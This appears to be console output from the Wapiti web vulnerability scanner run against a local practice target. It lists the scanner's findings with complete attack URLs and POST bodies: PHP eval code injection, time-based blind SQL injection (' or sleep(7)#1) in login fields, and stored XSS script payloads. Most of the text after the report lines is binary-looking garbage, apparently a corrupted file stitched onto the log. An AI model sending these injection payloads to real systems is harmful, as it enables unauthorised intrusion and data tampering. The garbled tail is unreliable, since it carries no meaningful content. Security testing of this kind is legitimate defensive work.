Received a HTTP 500 error in http://127.0.0.1/vuln/exec/eval.php
  Evil url: http://127.0.0.1/vuln/exec/eval.php?code=sleep%287%29%231
Blind SQL vulnerability in http://127.0.0.1/vuln/sql/login_blind.php via injection in the parameter login
  Evil url: http://127.0.0.1/vuln/sql/login_blind.php?login=%27%20or%20sleep%287%29%231&password=test
Blind SQL vulnerability in http://127.0.0.1/vuln/sql/login_blind.php via injection in the parameter password
  Evil url: http://127.0.0.1/vuln/sql/login_blind.php?login=test&password=%27%20or%20sleep%287%29%231
Blind SQL vulnerability in http://127.0.0.1/vuln/sql/login_post_blind.php via injection in the parameter login
  Evil request:
    POST /vuln/sql/login_post_blind.php HTTP/1.1
    Host: 127.0.0.1
    Referer: http://127.0.0.1/vuln/sql/login_post_blind.php
    Content-Type: application/x-www-form-urlencoded

    login=%27%20or%20sleep%287%29%231&password=letmein
Blind SQL vulnerability in http://127.0.0.1/vuln/sql/login_post_blind.php via injection in the parameter password
  Evil request:
    POST /vuln/sql/login_post_blind.php HTTP/1.1
    Host: 127.0.0.1
    Referer: http://127.0.0.1/vuln/sql/login_post_blind.php
    Content-Type: application/x-www-form-urlencoded

    login=default&password=%27%20or%20sleep%287%29%231

[+] Launching module permanentxss
Stored XSS vulnerability in http://127.0.0.1/vuln/xss/permanent_xss_in_post.php via injection in the parameter vuln
  Evil request:
    POST /vuln/xss/permanent_xss_in_post.php HTTP/1.1
    Host: 127.0.0.1
    Referer: http://127.0.0.1/vuln/xss/permanent_xss_in_post.php
    Content-Type: application/x-www-form-urlencoded

    firstname=James&lastname=Bond&vuln=%3Cscript%3Ealert%28%27w1rc0mzxmd%27%29%3C%2Fscript%3E
Stored XSS vulnerability in http://127.0.0.1/vuln/xss/permanent_xss_in_post_direct.php via injection in the parameter vuln
  Evil request:
    POST /vuln/xss/permanent_xss_in_post_direct.php HTTP/1.1
    Host: 127.0.0.1
    Referer: http://127.0.0.1/vuln/xss/permanent_xss_in_post_direct.php
    Content-Type: application/x-www-form-urlencoded

    firstname=James&lastname=Bond&vuln=%3Cscript%3Ealert%28%27wz00qm40jx%27%29%3C%2Fscript%3E
Stored XSS vulnerability in http://127.0.0.1/vuln/xss/permanent_xss_in_get.php via injection in the parameter vuln
  Evil url: http://127.0.0.1/vuln/xss/permanent_xss_in_get.php?firstname=James&lastname=Bond&vuln=%3Cscript%3Ealert%28%27we37lsoicn%27%29%3C%2Fscript%3E
Stored XSS vulnerability in http://127.0.0.1/vuln/xss/permanent_xss_in_get_direct.php via injection in the parameter vuln
  Evil url: http://127.0.0.1/vuln/xss/permanent_xss_in_get_direct.php?firstname=James&lastname=Bond&vuln=wrb6hruotv
Stored XSS vulnerability in http://127.0.0.1/vuln/xss/permanent_xss_in_get_direct.php via injection in the parameter vuln
  Evil url: http://127.0.0.1/vuln/xss/permanent_xss_in_get_direct.php?firstname=James&lastname=Bond&vuln=wrb6hruotv
Stored XSS vulnerability in http://127.0.0.1/vuln/xss/permanent_xss_in_post_result_elsewhere_submit.php via injection in the parameter vuln
  Evil request:
    POST /vuln/xss/permanent_xss_in_post_result_elsewhere_submit.php HTTP/1.1
    Host: 127.0.0.1
    Referer: http://127.0.0.1/vuln/xss/permanent_xss_in_post_result_elsewhere.php
    Content-Type: application/x-www-form-urlencoded

    firstname=James&lastname=Bond&vuln=%3Cscript%3Ealert%28%27wewjm7d17s%27%29%3C%2Fscript%3E

Report
------
A report has been generated in the file /home/audit/.wapiti/generated_report
Open /home/audit/.wapiti/generated_report/index.html with a browser to see this report.
@p!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx /(((9e!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx8c5^!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx>n   8c!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx Bu mmm0U!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx=k  9e!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx>>xxx4\!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx AsN6 ;h!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx%AXXX```4 Bu!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx.PLLLlll+++ &?o!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx@qbJ 9e!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx:f #5^!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx?o / /R!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx?orF 7a!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx7a 0 *2Y!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx;i 8  "-P!Cw!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx>m l>4\!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx Cv5]&C 1 " ! 
/%@2Y Bt!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx8c(G4 #  +#>/T@q!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx;h b6*I!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx3Y X,3 Bu!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx&DJ 9e!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx>n $*"< Bt!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx)HL 
/S!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx5^l /T!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx6_ #,Z $@=l!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx@q)Hv"<3[ Bu!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Cw7a&C $      "m!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Cw;h4\.Q-P-P-P-P-P-P0U2X6`9d;h'Dr (@Xl~ ((G>n!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx9d"<  xdR:2Nj 
$3Z!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx Bu*I ~`H(8\7`!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx+L vR. $T     # % * + + + + + + (  4 Bt!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx;h  " ) + + + + + + ( % !    tD>l   & -3 8#>&D*J-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P,N!; 9e!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx-P '%B-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P,N)H&C"=7 1 + #  ^0J   ! *3!;&C+L-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P+L +.Q!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Cw4 7-O-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P)I%A 8 0 ( r:.l  # . :'E,O-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P+L %*J!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx Bu *3-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P+M%B6 +    Z0n  (6'E-O-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P$@ /S!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx / *J-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P,N$@2 # \`  ! 
0#>+L-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P(G :f!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx(G,O-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P)H : +F0  "3&D-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P)I !Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx>m-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P,N$? . j4  *"=+M-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P%B5^!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!: +M-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P)I8 $ p|  *#>,O-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P * 1!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx$@-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P+L 8 $ ^  !7+M-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P,M 
!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx7a-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P(G 1v   )&C-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P  Bt!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx-P *-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P,O!; "X6  +'E-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P+L!Cw!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx3Y-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-O"= #h $@-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P!;  "!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!DxAr 